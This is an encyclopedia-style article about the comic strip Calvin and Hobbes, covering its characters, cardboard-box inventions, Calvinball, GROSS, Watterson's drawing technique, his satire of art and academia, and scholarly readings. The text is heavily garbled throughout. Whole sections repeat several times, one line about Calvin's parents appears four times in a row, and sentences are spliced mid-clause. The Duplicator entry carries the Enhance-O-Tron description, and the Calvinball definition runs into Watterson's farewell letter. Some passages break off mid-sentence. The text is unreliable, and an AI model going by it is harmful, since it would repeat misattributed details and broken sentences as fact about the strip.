    The hard part for us avant-garde post-modern artists is deciding whether or not to embrace commercialism Do we allow our work to be hyped and exploited by a market that's simply hungry for the next new thing Do we participate in a system that turns high art into low art so it's better suited for mass consumption Of course, when an artist goes commercial, he makes a mockery of his status as an outsider and free thinker He buys into the crass and shallow values art should transcend He trades the integrity of his art for riches and fame Oh, what the heck I'll do it

 Social criticisms

In addition to his criticisms of art and academia, Watterson often used the strip to comment on American culture and society With rare exception, the strip avoids reference to actual people or events Watterson's commentary is therefore necessarily generalized He expresses frustration with public decadence and apathy, with commercialism, and with the pandering nature of the mass media Calvin is often seen "glued" to the television, while his father speaks with the voice of ascetic virtue, struggling to impart his values to Calvin

Watterson's vehicle for criticism is often Hobbes, who comments on Calvin's unwholesome habits from a more cynical perspective He is more likely to make a wry observation than actually intervene; he may merely watch as Calvin inadvertently makes the point himself In one instance, Calvin tells Hobbes about a science fiction story he has read in which machines turn humans into zombie slaves Hobbes makes a comment about the irony of machines controlling people instead of the other way around; Calvin then exclaims, "I'll say Hey! What time is it My TV show is on!" and sprints back inside to watch it

A Sunday, 21 June 1992 strip discussing the Big Bang coined the term "Horrendous Space Kablooie" for the event, a term which has achieved some tongue-in-cheek popularity among the scientific community, particularly in informal discussion and often shortened to "the HSK"

 Visual distortions

On several occasions, Watterson drew strips with strange visual distortions: inverted colors, objects turning "neo-cubist", or fantasy environments with other unusual physical phenomena Only Calvin is able to perceive these alterations, which seem to illustrate both his own shifting point of view and a typical six-year-old's wild imagination

In the Tenth Anniversary Book, Watterson explains that some of these strips were metaphors for his own experiences, illustrating, for example, his conflicts with his syndicate: a 1989 Sunday strip, normally in color, was drawn almost entirely in an inverted monochrome Calvin is accused by his father of seeing issues "in black and white"—an accusation sometimes leveled at Watterson regarding his refusal to license the strip—to which Calvin, echoing Watterson's own retort, replies, "Sometimes that's the way things are!"

 Passage of time

When the strips were originally published, Calvin's settings were seasonally appropriate for the Northern Hemisphere Calvin would be seen building snowmen or sledding during the period from November through February or so, and outside activities such as water balloon fights would replace school from June through August Christmas and Halloween strips were run during those times of year

Although Watterson depicts several years' worth of holidays, school years, summer vacations, and camping trips, and characters are aware of multiple "current" years such as "'94 model toboggans," "Vote Dad in '88," the '90s as the new decade, etc Calvin is never shown to age, pass to second grade, nor have any birthday celebrations The only birthday ever shown was that of Susie Derkins Such temporal distortions are fairly common among comic strips, as with the children in Peanuts, who existed without aging for decades Likewise, the characters in Krazy Kat celebrate the New Year but never grow old, and young characters like Ignatz Mouse's offspring never seem to grow up These uses of a floating timeline are very unlike series such as Gasoline Alley, Doonesbury and until 2007 For Better or For Worse, in which the characters age each year with their reading audience, get married, and have children

While Calvin does not grow older in the strip, reference is made in two strips—from November 17 and 18, 1995 ten years since the strip's debut—to Calvin having once been two and three years old and now feeling that "a lifetime of experience has left 

 Academic response

In her book When Toys Come Alive, Lois Rostow Kuznets discusses Calvin and Hobbes in the context of other literature featuring living toys She argues that these toys are examples of transitional objects that mediate childhood experience and the adult world, where Hobbes serves both as a figure of Calvin's childish fantasy life and as an outlet for the expression of libidinous desires more associated with adults She cites, for example, a strip where Hobbes expresses a fantasy of playing "saxophone for an all-girl cabaret in New Orleans" as an example where Hobbes expresses a desire that is more sophisticated and adult than Calvin's frame of reference usually allows Kuznets also looks at Calvin's other fantasies, suggesting that they are a second tier of fantasies utilized in places like school where transitional objects such as Hobbes would not be socially acceptable

A second line of argument comes from Philip Sandifer, who uses Calvin and Hobbes as the main example for a reading of comic strips based on the psychoanalytic theories of Jacques Lacan He draws parallel between Hobbes's status as an imaginary friend and the Lacanian concept of the Imaginary, suggesting that a given comic strip is an attempt to construct a momentary and ephemeral present that will be dismantled by the punchline which he allies with the Lacanian Real, wiping the slate and allowing the process to begin again the next day He suggests that the strip takes place in an eternal present with no real reference to its past, which is erased each day with the punchline so that a new present can be constructed He also looks at the later Sunday strips, which are known for the technical skill Watterson displayed when given a more unrestricted layout, arguing that his layouts are best read not in terms of their use of space but in terms of their depiction of time
Named after the 16th-century theologian, Calvin is an impulsive, sometimes overly creative, imaginative, energetic, curious, intelligent, and often selfish six-year-old, whose last name is never mentioned in the strip Despite his low grades, Calvin has a wide vocabulary range that rivals that of an adult as well as an emerging philosophical mind:

        Calvin: "Dad, are you vicariously living through me in the hope that my accomplishments will validate your mediocre life and in some way compensate for all of the opportunities you botched"

        Calvin's father: "If I were, you can bet I'd be re-evaluating my strategy"

        Calvin later, to his mother: "Mom, Dad keeps insulting me"

He commonly wears his distinctive red-and-black striped shirt, black pants, magenta socks and white sneakers He is also a compulsive reader of comic books and has a tendency to order items marketed in comic books or on boxes of his favorite cereal, "Chocolate Frosted Sugar Bombs" Calvin chews gum regularly and subscribes to a magazine called Chewing Throughout the series, he is also revealed to be a "trial and error" sort of person Watterson has described Calvin thus:

     "Calvin is pretty easy to do because he is outgoing and rambunctious and there's not much of a filter between his brain and his mouth"
     "I guess he's a little too intelligent for his age The thing that I really enjoy about him is that he has no sense of restraint, he doesn't have the experience yet to know the things that you shouldn't do"

 Hobbes

    Main article: Hobbes Calvin and Hobbes

Hobbes

From everyone else's point of view, Hobbes is Calvin's stuffed tiger From Calvin's point of view, however, Hobbes is an anthropomorphic tiger, much larger than Calvin and full of independent attitudes and ideas But when the perspective shifts to any other character, readers again see merely a stuffed animal, usually seated at an off-kilter angle This is, of course, an odd dichotomy, and Watterson explains that some of these strips were metaphors for his own experiences, illustrating, for example, his conflicts with his syndicate: a 1989 Sunday strip, normally in color, was drawn almost entirely in an inverted monochrome Calvin is accused by his father of seeing issues "in black and white"—an accusation sometimes leveled at Watterson regarding his refusal to license the strip—to which Calvin, echoing Watterson's own retort, replies, "Sometimes that's the way things are!"

 Passage of time

When the strips were originally published, Calvin's settings were seasonally appropriate for the Northern Hemisphere Calvin would be seen building snowmen or sledding during the period from November through February or so, and outside activities such as water balloon fights would replace school from June through August Christmas and Halloween strips were run during those times of year

Although Watterson depicts several years' worth of holidays, school years, summer vacations, and camping trips, and characters are aware of multiple "current" years such as "'94 model toboggans," "Vote Dad in '88," the '90s as the new decade, etc Calvin is never shown to age, pass to second grade, nor have any birthday celebrations The only birthday ever shown was that of Susie Derkins Such temporal distortions are fairly common among comic strips, as with the children in Peanuts, who existed without aging for decades Likewise, the characters in Krazy Kat celebrate the New Year but never grow old, and young characters like Ignatz Mouse's offspring never seem to grow up These uses of a floating timeline are very unlike series such as Gasoline Alley, Doonesbury and until 2007 For Better or For Worse, in which the characters age each year with their reading audience, get married, and have children

While Calvin does not grow older in the strip, reference is made in two strips—from November 17 and 18, 1995 ten years since the strip's debut—to Calvin having once been two and three years old and now feeling that "a lifetime of experience has left 

 Academic response

In her book When Toys Come Alive, Lois Rostow Kuznets discusses Calvin and Hobbes in the context of other literature featuring living toys She argues that these toys are examples of transitional objects that mediate childhood experience and the adult world, where Hobbes serves both as a figure of Calvin's childish fantasy life and as an outlet for the expression of libidinous desires more associated with adults She cites, for example, a strip where Hobbes expresses a desire that is more sophisticated and adult than Calvin's frame of reference usually allows Kuznets also looks at Calvin's other fantasies, suggesting that they are a second tier of fantasies utilized in places like school where transitional objects such as Hobbes would not be socially acceptable

A second line of argument comes from Philip Sandifer, who uses Calvin and Hobbes as the main example for a reading of comic strips based on the psychoanalytic theories of Jacques Lacan He draws parallel between Hobbes's status as an imaginary friend and the Lacanian concept of the Imaginary, suggesting that a given comic strip is an attempt to construct a momentary and ephemeral present that will be dismantled by the punchline which he allies with the Lacanian Real, wiping the slate and allowing the process to begin again the next day He suggests that the strip takes place in an eternal present with no real reference to its past, which is erased each day with the punchline so that a new present can be constructed He also looks at the later Sunday strips, which are known for the technical skill Watterson displayed when given a more unrestricted layout, arguing that his layouts are best read not in terms of their use of space but in terms of their depiction of time
Named after the 16th-century theologian, Calvin is an impulsive, sometimes overly creative, imaginative, energetic, curious, intelligent, and often selfish six-year-old, whose last name is never mentioned in the strip Despite his low grades, Calvin has a wide vocabulary range that rivals that of an adult as well as an emerging philosophical mind:

        Calvin: "Dad, are you vicariously living through me in the hope that my accomplishments will validate your mediocre life and in some way compensate for all of the opportunities you botched"

        Calvin's father: "If I were, you can bet I'd be re-evaluating my strategy"

        Calvin later, to his mother: "Mom, Dad keeps insulting me"

He commonly wears his distinctive red-and-black striped shirt, black pants, magenta socks and white sneakers He is also a compulsive reader of comic books and has a tendency to order items marketed in comic books or on boxes of his favorite cereal, "Chocolate Frosted Sugar Bombs" Calvin chews gum regularly and subscribes to a magazine called Chewing Throughout the series, he is also revealed to be a "trial and error" sort of person Watterson has described Calvin thus:

     "Calvin is pretty easy to do because he is outgoing and rambunctious and there's not much of a filter between his brain and his mouth"
     "I guess he's a little too intelligent for his age The thing that I really enjoy about him is that he has no sense of restraint, he doesn't have the experience yet to know the things that you shouldn't do"

 Hobbes

    Main article: Hobbes Calvin and Hobbes

 Calvin's family
Calvin's parents, always referred to only as "Mom" and "Dad", or "Dear" to each other
Calvin's parents, always referred to only as "Mom" and "Dad", or "Dear" to each other
Calvin's parents, always referred to only as "Mom" and "Dad", or "Dear" to each other
Calvin's parents, always referred to only as "Mom" and "Dad", or "Dear" to each other

Dad's first appearance: November 18, 1985 Dad's last appearance: December 3, 1995

Mom's first appearance: November 26, 1985 Mom's last appearance: December 21, 1995

Calvin's mother and father are for the most part typical Middle American middle-class parents Like many other characters in the strip, their relatively down-to-earth and sensible attitudes serve primarily as a foil for Calvin's outlandish excuses for his antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as a rebellion against organized team sports; according to Hobbes, "No sport is less organized than Calvinball!"

The only consistent rule is that Calvinball may never be played with the same rules twice Calvinball is essentially a game of wits and creativity rather than stamina or athletic skill, a prominent nomic self-modifying game, and one where Hobbes usually outwits Calvin himself

Calvin and Hobbes frequently ride downhill in a wagon, sled, or toboggan, depending on the season, as a device to add some physical comedy to the strip and because, according to Watterson, "it's a lot more interesting 

During winter, Calvin often engages in snowball fights with Hobbes or Susie, who frequently best him due to their own wit or Calvin's unreliable aim Calvin is attentive to the craft of making a good snowball or slushball, but his delight in hitting Susie in the back of the head with a well-aimed snowball is often tempered by his anxiousness to remain on Santa's "good" list at Christmas time

Calvin is also very talented and creative at building snowmen, but he usually puts them in scenes that depict the snowmen dying or suffering in grotesque ways In one scene Calvin builds a row of saluting snowmen as a means to humiliate his dad as he returns from work "He knows I hate this," says his father as he proceeds up the front walk In another, to retaliate Susie's creation of a "snowwoman", he decides to create an "anatomically correct" snowman in the front yard His creations tend to alarm his parents due to their macabre nature In a notable storyline, Calvin builds a snowman and brings it to life in a manner reminiscent of Frankenstein's monster, and which proceeds to create more of its own kind This storyline gave the title to the Calvin and Hobbes books, published from 1987 to 2005 These include eleven collections, which form a complete archive of the newspaper strips, except for a single daily strip from November 28, 1985 the collections do contain a strip for this date, but it is not the same strip that appeared in some newspapers The alternate strip, a joke about Hobbes taking a bath in the washing machine, has circulated around the Internet  Treasuries usually combine the two preceding collections albeit leaving out some strips with bonus material and include color reprints of Sunday comics

Watterson included a unique Easter egg in The Essential Calvin and Hobbes The back cover is a scene of a giant Calvin rampaging through a town The scene is in fact a faithful reproduction of the town square actually a triangle in Watterson's home town of Chagrin Falls, Ohio The giant Calvin has uprooted and is holding in his hands the Popcorn Shop, a small, iconic candy and ice cream shop overlooking the town's namesake falls

A complete collection of Calvin and Hobbes strips, in three hardcover volumes with a total 1440 pages, was released on October 4, 2005, by Andrews McMeel Publishing It also includes color prints of the art used on paperback covers, the treasuries' extra illustrated stories and poems, and a new introduction by Bill Watterson The alternate 1985 strip is still omitted, and two other strips January 7, 1987, and November 25, 1988 have altered dialog

To celebrate the release which coincided with the strip's ten year absence in newspapers and the twentieth anniversary of the strip, Calvin and Hobbes reruns were made available to newspapers from Sunday, September 4, 2005, through Saturday, December 31, 2005,

Early books were printed in smaller format in black and white; these were later reproduced in twos in color in the "Treasuries" Essential, Authoritative, and Indispensable, except for the contents of Attack of the Deranged Mutant Killer Monster Snow Goons, after the name Calvin gives to the first creature and its compatriots in the story

Calvin, unlike Hobbes, thinks of snowmen as fine art, worthy of highbrow criticism and expensive pricing Bill Watterson has said that this is a parody of art's "pretentious blowhards"

Calvin is confronted every year with Christmas, as his mischievous nature conflicts with his greed for presents from Santa Claus which requires that he behave Calvin frets continually during the Christmas season, sometimes devising strategy by which to fool Santa Claus into giving him gifts Calvin's list of desired "loot," as he terms Christmas presents, is implied to include "incendiary weapons", of which some examples are given atom bombs, torpedoes, a heat-seeking guided missile, grenade launcher, etc in dialogue Most Christmas sequences of strips depict Calvin's parents playing the role of Santa Claus by secretly placing presents beneath the Christmas Tree or in Calvin's stocking; however, one later Sunday strip depicted Santa Claus discussing Calvin's list and history with one of his assistants, although the "reality" of this is left undefined Occasionally, a Christmas strip depicts some kindness shown by Calvin to Hobbes, as if to comment on the morals perceived as being part of the Christmas holiday One Sunday strip appeared as a poem entitled "Christmas Eve", featuring a described scene of Calvin sleeping beside Hobbes between the Christmas Tree and a fire

GROSS is Calvin's secret club, whose sole purpose is to exclude girls generally, and Susie Derkins specifically The name is an acronym that stands for Get Rid Of Slimy girlS Calvin admits "slimy girls" is a bit redundant, as all girls are slimy, "but otherwise it doesn't spell anything" GROSS is headquartered in a tree house Hobbes can climb up to the tree house, but Calvin requires a rope Hobbes refuses to drop down the rope until Calvin has said the password, which is an ode to tigers that is over eight verses long and occasionally accompanied by a dance Calvin and Hobbes are its only members, and each takes up multiple official titles while wearing newspaper chapeaux during meetings Most commonly, Calvin's title is Dictator-For-Life, and Hobbes is President and First Tiger The club has an anthem, but most of its words are unknown to outsiders Calvin often awards badges, promotions, etc, such as "Bottle Caps of Valor" Many GROSS plans to annoy or otherwise attack Susie end in failure, while many meetings end in a Calvinball-style battle of rule changes or promotion granting, before degenerating into a brawl

Both the Noodle Incident and the book Hamster Huey and the Gooey Kablooie were left to the reader's imagination, where Watterson was sure they would be “more outrageous” than he could portray

Watterson's technique started with minimalist pencil sketches drawn with a light pencil though the larger Sunday strips often required more elaborate work; he then would use a small sable brush and India ink on the Strathmore bristol board to complete most of the remaining drawing He also letters dialogue with a Rapidograph fountain pen, and he uses a crowquill pen for odds and ends He whites out the mistakes with Liquid Paper He was careful in his use of color, often spending a great deal of time in choosing the right colors to employ for the weekly Sunday strip When Calvin and Hobbes started, there were 64 colors available for the Sunday strips For the later Sunday strips, Watterson had 125 colors, as well as the ability to fade the colors into each other

 Art and academia

Watterson used the strip to criticize the artistic world, principally through Calvin's unconventional creations of snowmen but also through other expressions of childhood art When Miss Wormwood complains that he is wasting class time drawing incomprehensible things a Stegosaurus in a rocket ship, for example, Calvin proclaims himself "on the cutting edge of the avant-garde" He begins exploring the medium of snow when a warm day melts his snowman His next sculpture "speaks to the horror of our own mortality, inviting the viewer to contemplate the evanescence of life" In further strips, Calvin's creative instincts diversify to include sidewalk drawings or as he terms them, examples of "suburban postmodernism"

Watterson also lampooned the academic world In one example, Calvin writes a "revisionist autobiography", recruiting Hobbes to take pictures of him doing stereotypical kid activities like playing sports in order to make him seem more well-adjusted In another strip, he carefully crafts an "artist's statement," claiming that such essays convey more messages than artworks themselves ever do Hobbes blandly notes "You misspelled Weltanschauung" He indulges in what Watterson calls "pop psychobabble" to justify his destructive rampages and shift blame to his parents, citing "toxic codependency" In one instance, he pens a book report based on the theory that the purpose of academic scholarship is to "inflate weak ideas, obscure poor reasoning, and inhibit clarity," entitled The Dynamics of Interbeing and Monological Imperatives in Dick and Jane: A Study in Psychic Transrelational Gender Modes Displaying his creation to Hobbes, he remarks, "Academia, here I come!" Watterson explains that he adapted this jargon and similar examples from several other strips from an actual book of art criticism

Overall, Watterson's satirical essays serve to attack both sides, criticizing both the commercial mainstream and the artists who are supposed to be "outside" it Not long after he began drawing his "Dinosaurs In Rocket Ships" series, Calvin tells Hobbes:

    The hard part for us avant-garde post-modern artists is deciding whether or not to embrace commercialism Do we allow our work to be hyped and exploited by a market that's simply hungry for the next new thing Do we participate in a system that turns high art into low art so it's better suited for mass consumption Of course, when an artist goes commercial, he makes a mockery of his status as an outsider and free thinker He buys into the crass and shallow values art should transcend He trades the integrity of his art for riches and fame Oh, what the heck I'll do it

 Social criticisms

In addition to his criticisms of art and academia, Watterson often used the strip to comment on American culture and society With rare exception, the strip avoids reference to actual people or events Watterson's commentary is therefore necessarily generalized He expresses frustration with public decadence and apathy, with commercialism, and with the pandering nature of the mass media Calvin is often seen "glued" to the television, while his father speaks with the voice of ascetic virtue, struggling to impart his values to Calvin

Watterson's vehicle for criticism is often Hobbes, who comments on Calvin's unwholesome habits from a more cynical perspective He is more likely to make a wry observation than actually intervene; he may merely watch as Calvin inadvertently makes the point himself In one instance, Calvin tells Hobbes about a science fiction story he has read in which machines turn humans into zombie slaves Hobbes makes a comment about the irony of machines controlling people instead of the other way around; Calvin then exclaims, "I'll say Hey! What time is it My TV show is on!" and sprints back inside to watch it

A Sunday, 21 June 1992 strip discussing the Big Bang coined the term "Horrendous Space Kablooie" for the event, a term which has achieved some tongue-in-cheek popularity among the scientific community, particularly in informal discussion and often shortened to "the HSK"

 Visual distortions

On several occasions, Watterson drew strips with strange visual distortions: inverted colors, objects turning "neo-cubist", or fantasy environments with other unusual physical phenomena Only Calvin is able to perceive these alterations, which seem to illustrate both his own shifting point of view and a typical six-year-old's wild imagination

In the Tenth Anniversary Book, Watterson explains that some of these strips were metaphors for his own experiences, illustrating, for example, his conflicts with his syndicate: a 1989 Sunday strip, normally in color, was drawn almost entirely in an inverted monochrome Calvin is accused by his father of seeing issues "in black and white"—an accusation sometimes leveled at Watterson regarding his refusal to license the strip—to which Calvin, echoing Watterson's own retort, replies, "Sometimes that's the way things are!"

 Passage of time

When the strips were originally published, Calvin's settings were seasonally appropriate for the Northern Hemisphere Calvin would be seen building snowmen or sledding during the period from November through February or so, and outside activities such as water balloon fights would replace school from June through August Christmas and Halloween strips were run during those times of year

Although Watterson depicts several years' worth of holidays, school years, summer vacations, and camping trips, and characters are aware of multiple "current" years such as "'94 model toboggans," "Vote Dad in '88," the '90s as the new decade, etc Calvin is never shown to age, pass to second grade, nor have any birthday celebrations The only birthday ever shown was that of Susie Derkins Such temporal distortions are fairly common among comic strips, as with the children in Peanuts, who existed without aging for decades Likewise, the characters in Krazy Kat celebrate the New Year but never grow old, and young characters like Ignatz Mouse's offspring never seem to grow up These uses of a floating timeline are very unlike series such as Gasoline Alley, Doonesbury and until 2007 For Better or For Worse, in which the characters age each year with their reading audience, get married, and have children

While Calvin does not grow older in the strip, reference is made in two strips—from November 17 and 18, 1995 ten years since the strip's debut—to Calvin having once been two and three years old and now feeling that "a lifetime of experience has left 

 Academic response

In her book When Toys Come Alive, Lois Rostow Kuznets discusses Calvin and Hobbes in the context of other literature featuring living toys She argues that these toys are examples of transitional objects that mediate childhood experience and the adult world, where Hobbes serves both as a figure of Calvin's childish fantasy life and as an outlet for the expression of libidinous desires more associated with adults She cites, for example, a strip where Hobbes expresses a desire that is more sophisticated and adult than Calvin's frame of reference usually allows Kuznets also looks at Calvin's other fantasies, suggesting that they are a second tier of fantasies utilized in places like school where transitional objects such as Hobbes would not be socially acceptable

A second line of argument comes from Philip Sandifer, who uses Calvin and Hobbes as the main example for a reading of comic strips based on the psychoanalytic theories of Jacques Lacan He draws parallel between Hobbes's status as an imaginary friend and the Lacanian concept of the Imaginary, suggesting that a given comic strip is an attempt to construct a momentary and ephemeral present that will be dismantled by the punchline which he allies with the Lacanian Real, wiping the slate and allowing the process to begin again the next day He suggests that the strip takes place in an eternal present with no real reference to its past, which is erased each day with the punchline so that a new present can be constructed He also looks at the later Sunday strips, which are known for the technical skill Watterson displayed when given a more unrestricted layout, arguing that his layouts are best read not in terms of their use of space but in terms of their depiction of time
Named after the 16th-century theologian, Calvin is an impulsive, sometimes overly creative, imaginative, energetic, curious, intelligent, and often selfish six-year-old, whose last name is never mentioned in the strip Despite his low grades, Calvin has a wide vocabulary range that rivals that of an adult as well as an emerging philosophical mind:

        Calvin: "Dad, are you vicariously living through me in the hope that my accomplishments will validate your mediocre life and in some way compensate for all of the opportunities you botched"

        Calvin's father: "If I were, you can bet I'd be re-evaluating my strategy"

        Calvin later, to his mother: "Mom, Dad keeps insulting me"

He commonly wears his distinctive red-and-black striped shirt, black pants, magenta socks and white sneakers He is also a compulsive reader of comic books and has a tendency to order items marketed in comic books or on boxes of his favorite cereal, "Chocolate Frosted Sugar Bombs" Calvin chews gum regularly and subscribes to a magazine called Chewing Throughout the series, he is also revealed to be a "trial and error" sort of person Watterson has described Calvin thus:

     "Calvin is pretty easy to do because he is outgoing and rambunctious and there's not much of a filter between his brain and his mouth"
     "I guess he's a little too intelligent for his age The thing that I really enjoy about him is that he has no sense of restraint, he doesn't have the experience yet to know the things that you shouldn't do"

 Hobbes

    Main article: Hobbes Calvin and Hobbes

Hobbes

From everyone else's point of view, Hobbes is Calvin's stuffed tiger From Calvin's point of view, however, Hobbes is an anthropomorphic tiger, much larger than Calvin and full of independent attitudes and ideas But when the perspective shifts to any other character, readers again see merely a stuffed animal, usually seated at an off-kilter angle This is, of course, an odd dichotomy, and Watterson explains it thus:

    When Hobbes is a stuffed toy in one panel and alive in the next, I'm juxtaposing the "grown-up" version of reality with Calvin's version, and inviting the reader to decide which is truer

Hobbes' true nature is made more ambiguous by episodes that seem to attribute real-life consequences to Hobbes's actions One example is his habit of pouncing on Calvin the moment he arrives home from school, an act which always leaves Calvin with bruises and scrapes that are evident to other characters In another incident, Hobbes manages to tie Calvin to a chair in such a way that Calvin's father is unable to understand how he could have done it himself Yet another incident features Hobbes leaving Calvin hanging by the seat of his pants from a tree branch above Calvin's head

Hobbes is named after the 17th-century philosopher Thomas Hobbes, who had what Watterson described as "a dim view of human nature"

Although the first strips clearly show Calvin capturing Hobbes by means of a snare with tuna fish sandwich as the bait, a later comic August 1, 1989 seems to imply that Hobbes is, in fact, older than Calvin, and has been around his whole life Watterson eventually decided that it was not important to establish how Calvin and Hobbes had first met

 Supporting characters

    Main article: Secondary characters in Calvin and Hobbes

 Calvin's family
Calvin's parents, always referred to only as "Mom" and "Dad", or "Dear" to each other
Calvin's parents, always referred to only as "Mom" and "Dad", or "Dear" to each other
Calvin's parents, always referred to only as "Mom" and "Dad", or "Dear" to each other

Dad's first appearance: November 18, 1985 Dad's last appearance: December 3, 1995

Mom's first appearance: November 26, 1985 Mom's last appearance: December 21, 1995

Calvin's mother and father are for the most part typical Middle American middle-class parents Like many other characters in the strip, their relatively down-to-earth and sensible attitudes serve primarily as a foil for Calvin's outlandish excuses for his antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes is an honor I'll long be proud of, and I've greatly appreciated your support and indulgence over the last decade Drawing this comic strip has been a privilege and a pleasure, and I thank you for giving me the opportunity

The 3,160th and final strip ran on Sunday, December 31, 1995

 Syndication and Watterson's artistic style are his characters' diverse and often exaggerated expressions particularly those of Calvin, elaborate and bizarre backgrounds for Calvin's flights of imagination, well-captured kinetics, and frequent visual jokes and metaphors In the later years of the strip, with more space available for his use, Watterson experimented more freely with different panel layouts, art styles, stories without dialogue, and greater use of whitespace He also made a point of not showing certain things explicitly: the "Noodle Incident" and the children's book Hamster Huey and the Gooey Kablooie are mentioned several times in passing, but Watterson left the details to the reader's imagination, where Watterson was sure they would be “more outrageous” than he could portray

Watterson's technique started with minimalist pencil sketches drawn with a light pencil though the larger Sunday strips often required more elaborate work; he then would use a small sable brush and India ink on the Strathmore bristol board to complete most of the remaining drawing He also letters dialogue with a Rapidograph fountain pen, and he uses a crowquill pen for odds and ends He whites out the mistakes with Liquid Paper He was careful in his use of color, often spending a great deal of time in choosing the right colors to employ for the weekly Sunday strip When Calvin and Hobbes started, there were 64 colors available for the Sunday strips For the later Sunday strips, Watterson had 125 colors, as well as the ability to fade the colors into each other

 Art and academia

Watterson used the strip to criticize the artistic world, principally through Calvin's unconventional creations of snowmen but also through other expressions of childhood art When Miss Wormwood complains that he is wasting class time drawing incomprehensible things a Stegosaurus in a rocket ship, for example, Calvin proclaims himself "on the cutting edge of the avant-garde" He begins exploring the medium of snow when a warm day melts his snowman His next sculpture "speaks to the horror of our own mortality, inviting the viewer to contemplate the evanescence of life" In further strips, Calvin's creative instincts diversify to include sidewalk drawings or as he terms them, examples of "suburban postmodernism"

Watterson also lampooned the academic world In one example, Calvin writes a "revisionist autobiography", recruiting Hobbes to take pictures of him doing stereotypical kid activities like playing sports in order to make him seem more well-adjusted In another strip, he carefully crafts an "artist's statement," claiming that such essays convey more messages than artworks themselves ever do Hobbes blandly notes "You misspelled Weltanschauung" He indulges in what Watterson calls "pop psychobabble" to justify his destructive rampages and shift blame to his parents, citing "toxic codependency" In one instance, he pens a book report based on the theory that the purpose of academic scholarship is to "inflate weak ideas, obscure poor reasoning, and inhibit clarity," entitled The Dynamics of Interbeing and Monological Imperatives in Dick and Jane: A Study in Psychic Transrelational Gender Modes Displaying his creation to Hobbes, he remarks, "Academia, here I come!" Watterson explains that he adapted this jargon and similar examples from several other strips from an actual book of art criticism

